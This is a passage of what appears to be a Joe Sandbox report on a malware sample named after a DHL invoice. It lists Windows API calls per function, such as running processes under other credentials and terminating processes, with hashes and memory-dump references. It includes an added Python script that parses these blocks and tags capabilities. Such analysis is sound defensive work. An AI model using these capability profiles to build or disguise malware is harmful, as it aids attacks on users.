                                                                                                                        • Associated: 00000000.00000002.2052947768.00000000003CC000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.2052947768.00000000003F2000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.2053015511.00000000003FC000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.2053042056.0000000000404000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_330000_DHL DOC INV 191224.jbxd
Similarity
• API ID: BeginPaintWindow$ClientLongPathRectRectangleScreenViewport
• String ID:
• API String ID: 3050599898-0
• Opcode ID: aaa98197f0122611f0070b7ed177810fef0827fcbdef6a3cb401b48de2bd82c6
• Instruction ID: a1008a1da1d2973f626ae633d51c06c7b062c089c6a9d6b6993074defb043f85
• Opcode Fuzzy Hash: aaa98197f0122611f0070b7ed177810fef0827fcbdef6a3cb401b48de2bd82c6
• Instruction Fuzzy Hash: 30419F70104300AFD722DF25CC89FAB7BE9EB4A320F14066AF994DB2B1C771A845DB61
APIs
• InterlockedExchange.KERNEL32(?,000001F5), ref: 003A080C
• ReadFile.KERNEL32(?,?,0000FFFF,?,00000000), ref: 003A0847
• EnterCriticalSection.KERNEL32(?), ref: 003A0863
• LeaveCriticalSection.KERNEL32(?), ref: 003A08DC
• ReadFile.KERNEL32(?,?,0000FFFF,00000000,00000000), ref: 003A08F3
• InterlockedExchange.KERNEL32(?,000001F6), ref: 003A0921
Memory Dump Source
• Source File: 00000000.00000002.2052860859.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
• Associated: 00000000.00000002.2052842332.0000000000330000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2052947768.00000000003CC000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2052947768.00000000003F2000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2053015511.00000000003FC000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2053042056.0000000000404000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_330000_DHL DOC INV 191224.jbxd
Similarity
• API ID: CriticalExchangeFileInterlockedReadSection$EnterLeave
• String ID:
• API String ID: 3368777196-0
• Opcode ID: ddcfe28fbae8a268a7d8773fe04c40d6f66188bc15c51f11ceab834a279354ae
• Instruction ID: f8a52fc011dcf4564d107c21c18b90b5350d92702f951b1c047642abb960b562
• Opcode Fuzzy Hash: ddcfe28fbae8a268a7d8773fe04c40d6f66188bc15c51f11ceab834a279354ae
• Instruction Fuzzy Hash: F2416A71900205EFDF1AAF54DC85AAAB7B8FF05300F1440A9ED04DE2A6D734EE65DBA4
APIs
• IsWindowVisible.USER32(?), ref: 00394C95
• SendMessageW.USER32(?,0000000E,00000000,00000000), ref: 00394CB2
• SendMessageW.USER32(?,0000000D,00000001,00000000), ref: 00394CEA
• _wcslen.LIBCMT ref: 00394D08
• CharUpperBuffW.USER32(00000000,00000000,?,?,?,?), ref: 00394D10
• _wcsstr.LIBVCRUNTIME ref: 00394D1A
Memory Dump Source
• Source File: 00000000.00000002.2052860859.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
• Associated: 00000000.00000002.2052842332.0000000000330000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2052947768.00000000003CC000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2052947768.00000000003F2000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2053015511.00000000003FC000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2053042056.0000000000404000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_330000_DHL DOC INV 191224.jbxd
Similarity
• API ID: MessageSend$BuffCharUpperVisibleWindow_wcslen_wcsstr
• String ID:
• API String ID: 72514467-0
• Opcode ID: b2da63e9004f63504f334c36a2c79b4a7adb5cda22919898a9e7913db04dbd2c
• Instruction ID: 25956ae18263185f4a3cbf26e05e8572cd29faee1c1c2f11c25d25c56409d35b
• Opcode Fuzzy Hash: b2da63e9004f63504f334c36a2c79b4a7adb5cda22919898a9e7913db04dbd2c
• Instruction Fuzzy Hash: 1B21F676604200BFEF175B39AD49E7BBBACDF45750F158029F809CE192EA61DC4297A0
APIs
  • Part of subcall function 00333AA2: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00333A97,?,?,00332E7F,?,?,?,00000000), ref: 00333AC2
• _wcslen.LIBCMT ref: 003A587B
• CoInitialize.OLE32(00000000), ref: 003A5995
• CoCreateInstance.OLE32(003CFCF8,00000000,00000001,003CFB68,?), ref: 003A59AE
• CoUninitialize.OLE32 ref: 003A59CC
Strings
Memory Dump Source
• Source File: 00000000.00000002.2052860859.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
• Associated: 00000000.00000002.2052842332.0000000000330000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2052947768.00000000003CC000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2052947768.00000000003F2000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2053015511.00000000003FC000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2053042056.0000000000404000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_330000_DHL DOC INV 191224.jbxd
Similarity
• API ID: CreateFullInitializeInstanceNamePathUninitialize_wcslen
• String ID: .lnk
• API String ID: 3172280962-24824748
• Opcode ID: 16761ed8ab8b31bf09243bd1ef06638f0d642bfc6690dc3a2a852c1ea42b6911
• Instruction ID: d3c0d65fb048b0ee25f710c8d47b7eea940051800bd8d6434b0169704944416c
• Opcode Fuzzy Hash: 16761ed8ab8b31bf09243bd1ef06638f0d642bfc6690dc3a2a852c1ea42b6911
• Instruction Fuzzy Hash: BDD152756087019FC716DF24C480A2ABBE5FF8A720F15895DF88A9B361DB31EC45CB92
APIs
  • Part of subcall function 00390FB4: GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 00390FCA
  • Part of subcall function 00390FB4: GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 00390FD6
  • Part of subcall function 00390FB4: GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 00390FE5
  • Part of subcall function 00390FB4: HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 00390FEC
  • Part of subcall function 00390FB4: GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 00391002
• GetLengthSid.ADVAPI32(?,00000000,00391335), ref: 003917AE
• GetProcessHeap.KERNEL32(00000008,00000000), ref: 003917BA
• HeapAlloc.KERNEL32(00000000), ref: 003917C1
• CopySid.ADVAPI32(00000000,00000000,?), ref: 003917DA
• GetProcessHeap.KERNEL32(00000000,00000000,00391335), ref: 003917EE
• HeapFree.KERNEL32(00000000), ref: 003917F5
Memory Dump Source
• Source File: 00000000.00000002.2052860859.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
• Associated: 00000000.00000002.2052842332.0000000000330000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2052947768.00000000003CC000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2052947768.00000000003F2000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2053015511.00000000003FC000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2053042056.0000000000404000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_330000_DHL DOC INV 191224.jbxd
Similarity
• API ID: Heap$Process$AllocInformationToken$CopyErrorFreeLastLength
• String ID:
• API String ID: 3008561057-0
• Opcode ID: 286da6f94cdc82ced2c6b8b0fd3a8b725a8a6173d396e4c535e8c5e9f1e4ff82
• Instruction ID: 444dcba57190ea6bcf381bbb112bd986a2362c892acf718935e5cf20a67283c6
• Opcode Fuzzy Hash: 286da6f94cdc82ced2c6b8b0fd3a8b725a8a6173d396e4c535e8c5e9f1e4ff82
• Instruction Fuzzy Hash: EC11A932A20206FFDF229FA5CC49FAE7BADEB41355F144018F486E7220C736A940CB60
APIs
• GetCurrentProcess.KERNEL32(0000000A,00000004), ref: 003914FF
• OpenProcessToken.ADVAPI32(00000000), ref: 00391506
• CreateEnvironmentBlock.USERENV(?,00000004,00000001), ref: 00391515
• CloseHandle.KERNEL32(00000004), ref: 00391520
• CreateProcessWithLogonW.ADVAPI32(?,?,?,00000000,00000000,?,?,00000000,?,?,?), ref: 0039154F
• DestroyEnvironmentBlock.USERENV(00000000), ref: 00391563
Memory Dump Source
• Source File: 00000000.00000002.2052860859.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
• Associated: 00000000.00000002.2052842332.0000000000330000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2052947768.00000000003CC000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2052947768.00000000003F2000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2053015511.00000000003FC000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2053042056.0000000000404000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_330000_DHL DOC INV 191224.jbxd
Similarity
• API ID: Process$BlockCreateEnvironment$CloseCurrentDestroyHandleLogonOpenTokenWith
• String ID:
• API String ID: 1413079979-0
• Opcode ID: 35feb44f80e7b52634de46ea23375a39a5290d811f14582e2264ac2bb4a3fe3f
• Instruction ID: dc2282a5aad6c3d26b2b6630ee3ab2207c12f474cb2805b03877d4f0cf9e2bbe
• Opcode Fuzzy Hash: 35feb44f80e7b52634de46ea23375a39a5290d811f14582e2264ac2bb4a3fe3f
• Instruction Fuzzy Hash: A111147250024AABDF128FA8ED49FDA7BADFB49744F064025FA09A2060C375DE61DB60
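The function blocks above are what an analyst reads by eye to spot capabilities: the IsWindowVisible/SendMessageW/CharUpperBuffW/_wcsstr block is a case-insensitive window-title match (the SendMessageW constants 0000000E and 0000000D are WM_GETTEXTLENGTH and WM_GETTEXT), the GetTokenInformation/GetLengthSid/CopySid block copies a token SID, the CreateEnvironmentBlock/CreateProcessWithLogonW block launches a process under other credentials, and the CoCreateInstance block next to the ".lnk" string creates a shortcut. The script below is an added example, not code from this report or from Joe Sandbox: it parses a few blocks copied from above in the plugin's own layout, keeps direct calls apart from "Part of subcall function" entries, decodes the SendMessageW message number, and tags each block with one of those capabilities. The capability rules and the embedded SAMPLE text are constructed for the example; the WM_ values are the winuser.h constants.

```python
"""Triage helper for Joe Sandbox IDA-plugin function listings ("APIs" blocks).
Added example, not code from the report or from Joe Sandbox. CAPABILITIES and
SAMPLE are constructed for it (SAMPLE reuses lines from the report's blocks)."""
import re
from dataclasses import dataclass, field
from typing import Optional

# One API line: optional "Part of subcall function <addr>:" prefix, Name.MODULE,
# an optional argument list (CRT entries such as _wcslen.LIBCMT carry none),
# then "ref: <call-site address>".
API_LINE = re.compile(
    r"^\s*•\s*(?:Part of subcall function (?P<sub>[0-9A-Fa-f]+):\s*)?"
    r"(?P<name>[A-Za-z_]\w*)\.(?P<module>\w+)"
    r"(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)"
)
STRING_ID = re.compile(r"^\s*•\s*String ID:\s*(?P<s>.*?)\s*$")

# winuser.h values; the second SendMessageW argument is the message number.
WINDOW_MESSAGES = {0x000D: "WM_GETTEXT", 0x000E: "WM_GETTEXTLENGTH"}

# Capability rules (assumption): every listed API must appear in one function
# block, whether called directly or through a "Part of subcall function" entry.
CAPABILITIES = {
    "run-as-other-user": {"CreateProcessWithLogonW", "CreateEnvironmentBlock"},
    "token-sid-copy": {"GetTokenInformation", "GetLengthSid", "CopySid"},
    "window-title-match": {"IsWindowVisible", "SendMessageW", "CharUpperBuffW", "_wcsstr"},
    "com-object-creation": {"CoInitialize", "CoCreateInstance"},
}


@dataclass
class Call:
    name: str
    module: str
    args: list
    ref: str                          # call-site address
    subcall_of: Optional[str] = None  # callee address for "Part of subcall" entries


@dataclass
class FunctionBlock:
    calls: list = field(default_factory=list)
    string_id: str = ""               # "String ID" from the block's Similarity section

    def api_names(self):
        return {c.name for c in self.calls}


def parse_blocks(text):
    """Split report text into one FunctionBlock per 'APIs' header."""
    blocks, current = [], None
    for line in text.splitlines():
        if line.strip() == "APIs":
            current = FunctionBlock()
            blocks.append(current)
            continue
        if current is None:
            continue
        m = API_LINE.match(line)
        if m:
            args = [a.strip() for a in m["args"].split(",")] if m["args"] is not None else []
            current.calls.append(Call(m["name"], m["module"], args, m["ref"], m["sub"]))
            continue
        m = STRING_ID.match(line)
        if m:
            current.string_id = m["s"]
    return blocks


def decode_window_messages(block):
    """Map call-site address -> message name for SendMessageW calls with a literal message."""
    out = {}
    for c in block.calls:
        if c.name == "SendMessageW" and len(c.args) >= 2 and c.args[1] != "?":
            out[c.ref] = WINDOW_MESSAGES.get(int(c.args[1], 16), "WM_" + c.args[1])
    return out


def tag_capabilities(block):
    names = block.api_names()
    tags = {cap for cap, needed in CAPABILITIES.items() if needed <= names}
    # The ".lnk" String ID beside CoCreateInstance is the report's hint at shortcut creation.
    if "com-object-creation" in tags and block.string_id.lower() == ".lnk":
        tags.add("shortcut-creation")
    return tags


SAMPLE = """\
APIs
• IsWindowVisible.USER32(?), ref: 00394C95
• SendMessageW.USER32(?,0000000E,00000000,00000000), ref: 00394CB2
• SendMessageW.USER32(?,0000000D,00000001,00000000), ref: 00394CEA
• _wcslen.LIBCMT ref: 00394D08
• CharUpperBuffW.USER32(00000000,00000000,?,?,?,?), ref: 00394D10
• _wcsstr.LIBVCRUNTIME ref: 00394D1A
Memory Dump Source
APIs
  • Part of subcall function 00390FB4: GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 00390FCA
• GetLengthSid.ADVAPI32(?,00000000,00391335), ref: 003917AE
• CopySid.ADVAPI32(00000000,00000000,?), ref: 003917DA
APIs
• OpenProcessToken.ADVAPI32(00000000), ref: 00391506
• CreateEnvironmentBlock.USERENV(?,00000004,00000001), ref: 00391515
• CreateProcessWithLogonW.ADVAPI32(?,?,?,00000000,00000000,?,?,00000000,?,?,?), ref: 0039154F
APIs
• CoInitialize.OLE32(00000000), ref: 003A5995
• CoCreateInstance.OLE32(003CFCF8,00000000,00000001,003CFB68,?), ref: 003A59AE
• CoUninitialize.OLE32 ref: 003A59CC
Similarity
• String ID: .lnk
"""

if __name__ == "__main__":
    for i, b in enumerate(parse_blocks(SAMPLE)):
        print(i, sorted(tag_capabilities(b)), decode_window_messages(b))
```

Because the report lists the same AutoIt runtime functions for every compiled AutoIt script, a tag such as run-as-other-user says the capability is present in the binary, not that the embedded script uses it; the tags are a reading aid for the Similarity and API ID fields, not a verdict.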
APIs
• GetLastError.KERNEL32(?,?,00353379,00352FE5), ref: 00353390
• ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 0035339E
• ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 003533B7
• SetLastError.KERNEL32(00000000,?,00353379,00352FE5), ref: 00353409
Memory Dump Source
• Source File: 00000000.00000002.2052860859.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
• Associated: 00000000.00000002.2052842332.0000000000330000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2052947768.00000000003CC000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2052947768.00000000003F2000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2053015511.00000000003FC000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2053042056.0000000000404000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_330000_DHL DOC INV 191224.jbxd
Similarity
• API ID: ErrorLastValue___vcrt_
• String ID:
• API String ID: 3852720340-0
• Opcode ID: 995797ac360642b0e60d7f4eb7c93153471c5c3f61bee80cc653904dc1028a51
• Instruction ID: 58bc309685bb793319ab707287d7bba639b618725c3d9d159c6f7d406e056b3c
• Opcode Fuzzy Hash: 995797ac360642b0e60d7f4eb7c93153471c5c3f61bee80cc653904dc1028a51
• Instruction Fuzzy Hash: E2012436619316BEE62727757DC5DA72A98EB053FBB21022DFC10891F0EF218D0E9648
APIs
• GetLastError.KERNEL32(?,?,00365686,00373CD6,?,00000000,?,00365B6A,?,?,?,?,?,0035E6D1,?,003F8A48), ref: 00362D78
• _free.LIBCMT ref: 00362DAB
• _free.LIBCMT ref: 00362DD3
• SetLastError.KERNEL32(00000000,?,?,?,?,0035E6D1,?,003F8A48,00000010,00334F4A,?,?,00000000,00373CD6), ref: 00362DE0
• SetLastError.KERNEL32(00000000,?,?,?,?,0035E6D1,?,003F8A48,00000010,00334F4A,?,?,00000000,00373CD6), ref: 00362DEC
• _abort.LIBCMT ref: 00362DF2
Memory Dump Source
• Source File: 00000000.00000002.2052860859.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
• Associated: 00000000.00000002.2052842332.0000000000330000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2052947768.00000000003CC000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2052947768.00000000003F2000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2053015511.00000000003FC000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2053042056.0000000000404000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_330000_DHL DOC INV 191224.jbxd
Similarity
• API ID: ErrorLast$_free$_abort
• String ID:
• API String ID: 3160817290-0
• Opcode ID: 5b97de697c8b924271ceb7415dfe7c41530f44d85bc381115350a52499566e01
• Instruction ID: d4b2789fe566684b7fb478adc3dbb381a3d299b34546a53839dc7897a8ef3223
• Opcode Fuzzy Hash: 5b97de697c8b924271ceb7415dfe7c41530f44d85bc381115350a52499566e01
• Instruction Fuzzy Hash: 9CF0C835A44E0167C2132738BD1AE6F255DAFC37A1F27C418F838DA1DEEF3498114260
APIs
  • Part of subcall function 00349639: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 00349693
  • Part of subcall function 00349639: SelectObject.GDI32(?,00000000), ref: 003496A2
  • Part of subcall function 00349639: BeginPath.GDI32(?), ref: 003496B9
  • Part of subcall function 00349639: SelectObject.GDI32(?,00000000), ref: 003496E2
• MoveToEx.GDI32(?,-00000002,00000000,00000000), ref: 003C8A4E
• LineTo.GDI32(?,00000003,00000000), ref: 003C8A62
• MoveToEx.GDI32(?,00000000,-00000002,00000000), ref: 003C8A70
• LineTo.GDI32(?,00000000,00000003), ref: 003C8A80
• EndPath.GDI32(?), ref: 003C8A90
• StrokePath.GDI32(?), ref: 003C8AA0
Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2052860859.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.2052842332.0000000000330000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2052947768.00000000003CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2052947768.00000000003F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2053015511.00000000003FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2053042056.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_330000_DHL DOC INV 191224.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Path$LineMoveObjectSelect$BeginCreateStroke
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 43455801-0
                                                                                                                        • Opcode ID: 2a720f713fc64bc7fa54cbafd882cfda3dcc587829b0eedaa337a2aaf5344e61
                                                                                                                        • Instruction ID: a85a6b7708529a49cf51765b60a530242981fe495e23f79403b0cbeeabdfafc8
                                                                                                                        • Opcode Fuzzy Hash: 2a720f713fc64bc7fa54cbafd882cfda3dcc587829b0eedaa337a2aaf5344e61
                                                                                                                        • Instruction Fuzzy Hash: 3E110976400118FFDB129F90DC88FEA7F6CEB08350F048026FA599A1A1C771AE55DFA0
                                                                                                                        APIs
                                                                                                                        • GetDC.USER32(00000000), ref: 00395218
                                                                                                                        • GetDeviceCaps.GDI32(00000000,00000058), ref: 00395229
                                                                                                                        • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00395230
                                                                                                                        • ReleaseDC.USER32(00000000,00000000), ref: 00395238
                                                                                                                        • MulDiv.KERNEL32(000009EC,?,00000000), ref: 0039524F
                                                                                                                        • MulDiv.KERNEL32(000009EC,00000001,?), ref: 00395261
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2052860859.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.2052842332.0000000000330000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2052947768.00000000003CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2052947768.00000000003F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2053015511.00000000003FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2053042056.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_330000_DHL DOC INV 191224.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: CapsDevice$Release
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 1035833867-0
                                                                                                                        • Opcode ID: d806107469f5aec186abb75e1256f14c3a2f2d278d135f14969df1e244741ba0
                                                                                                                        • Instruction ID: 7cea885f61d66a39d5c59e428a735347cd046af2417992d790f2ab0254710616
                                                                                                                        • Opcode Fuzzy Hash: d806107469f5aec186abb75e1256f14c3a2f2d278d135f14969df1e244741ba0
                                                                                                                        • Instruction Fuzzy Hash: B2014475A01714BBEF116BA59D49E5EBF78FB44751F084465FA08EB281D6709810CB60
                                                                                                                        APIs
                                                                                                                        • MapVirtualKeyW.USER32(0000005B,00000000), ref: 00331BF4
                                                                                                                        • MapVirtualKeyW.USER32(00000010,00000000), ref: 00331BFC
                                                                                                                        • MapVirtualKeyW.USER32(000000A0,00000000), ref: 00331C07
                                                                                                                        • MapVirtualKeyW.USER32(000000A1,00000000), ref: 00331C12
                                                                                                                        • MapVirtualKeyW.USER32(00000011,00000000), ref: 00331C1A
                                                                                                                        • MapVirtualKeyW.USER32(00000012,00000000), ref: 00331C22
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2052860859.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.2052842332.0000000000330000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2052947768.00000000003CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2052947768.00000000003F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2053015511.00000000003FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2053042056.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_330000_DHL DOC INV 191224.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Virtual
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 4278518827-0
                                                                                                                        • Opcode ID: 1dbf9536b93b398a80692d7e75a7a6eecf7ece35a36c7c4af1574c6ef35f3cc6
                                                                                                                        • Instruction ID: ee8bdd0a28db86e969ce8904682e86a5bc5c0dc111bfc0b855cc15b71d0c14ff
                                                                                                                        • Opcode Fuzzy Hash: 1dbf9536b93b398a80692d7e75a7a6eecf7ece35a36c7c4af1574c6ef35f3cc6
                                                                                                                        • Instruction Fuzzy Hash: F1016CB09027597DE3008F5A8C85B52FFA8FF19354F04411BD15C47A41C7F5A864CBE5
                                                                                                                        APIs
                                                                                                                        • PostMessageW.USER32(?,00000010,00000000,00000000), ref: 0039EB30
                                                                                                                        • SendMessageTimeoutW.USER32(?,00000010,00000000,00000000,00000002,000001F4,?), ref: 0039EB46
                                                                                                                        • GetWindowThreadProcessId.USER32(?,?), ref: 0039EB55
                                                                                                                        • OpenProcess.KERNEL32(001F0FFF,00000000,?,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 0039EB64
                                                                                                                        • TerminateProcess.KERNEL32(00000000,00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 0039EB6E
                                                                                                                        • CloseHandle.KERNEL32(00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 0039EB75
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2052860859.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.2052842332.0000000000330000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2052947768.00000000003CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2052947768.00000000003F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2053015511.00000000003FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2053042056.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_330000_DHL DOC INV 191224.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Process$Message$CloseHandleOpenPostSendTerminateThreadTimeoutWindow
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 839392675-0
                                                                                                                        • Opcode ID: fa25b775629497eb7d4134999facb2fb21b837184c1e7ac2448730284f4eaf0d
                                                                                                                        • Instruction ID: f1f1b056a8e0babc836813d6356f38e12b87ef5635e010ae369e9deb46df2eda
                                                                                                                        • Opcode Fuzzy Hash: fa25b775629497eb7d4134999facb2fb21b837184c1e7ac2448730284f4eaf0d
                                                                                                                        • Instruction Fuzzy Hash: 45F0BE72610158BBE7225B639C0EEEF7E7CEFCAB15F041158F605D1090D7A02A01C7B4
                                                                                                                        APIs
                                                                                                                        • GetClientRect.USER32(?), ref: 00387452
                                                                                                                        • SendMessageW.USER32(?,00001328,00000000,?), ref: 00387469
                                                                                                                        • GetWindowDC.USER32(?), ref: 00387475
                                                                                                                        • GetPixel.GDI32(00000000,?,?), ref: 00387484
                                                                                                                        • ReleaseDC.USER32(?,00000000), ref: 00387496
                                                                                                                        • GetSysColor.USER32(00000005), ref: 003874B0
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2052860859.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.2052842332.0000000000330000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2052947768.00000000003CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2052947768.00000000003F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2053015511.00000000003FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2053042056.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_330000_DHL DOC INV 191224.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: ClientColorMessagePixelRectReleaseSendWindow
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 272304278-0
                                                                                                                        • Opcode ID: 799e3b8fc598453bc473c9f9c9a9a83cac68006597b47f545a5cc33f3bb8d383
                                                                                                                        • Instruction ID: 7dea8eba5a749d9861e6462db8ca9d42b8288cd6998699b0e358afc542bc190a
                                                                                                                        • Opcode Fuzzy Hash: 799e3b8fc598453bc473c9f9c9a9a83cac68006597b47f545a5cc33f3bb8d383
                                                                                                                        • Instruction Fuzzy Hash: B6018F31410205EFDB129FA5DD08FEA7BBAFB04311F251060F919E30A1CB312D51EB10
                                                                                                                        APIs
                                                                                                                        • WaitForSingleObject.KERNEL32(?,000000FF), ref: 0039187F
                                                                                                                        • UnloadUserProfile.USERENV(?,?), ref: 0039188B
                                                                                                                        • CloseHandle.KERNEL32(?), ref: 00391894
                                                                                                                        • CloseHandle.KERNEL32(?), ref: 0039189C
